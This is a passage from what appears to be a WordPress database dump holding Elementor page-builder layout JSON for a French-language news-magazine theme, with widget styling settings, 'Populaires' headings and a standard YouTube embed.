p\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"qyofxgg\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=9uOETcuFjbE\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1362,478,'_elementor_version','0.4'),(1363,478,'_elementor_css','a:3:{s:4:\"time\";i:1508913997;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1365,360,'_oembed_a527ff439407ed49af172b09f4d77f15','<iframe width=\"1200\" height=\"675\" src=\"https://www.youtube.com/embed/9uOETcuFjbE?feature=oembed\" frameborder=\"0\" gesture=\"media\" allowfullscreen></iframe>'),(1366,360,'_oembed_time_a527ff439407ed49af172b09f4d77f15','1508914169'),(1367,479,'_elementor_edit_mode','builder'),(1368,479,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\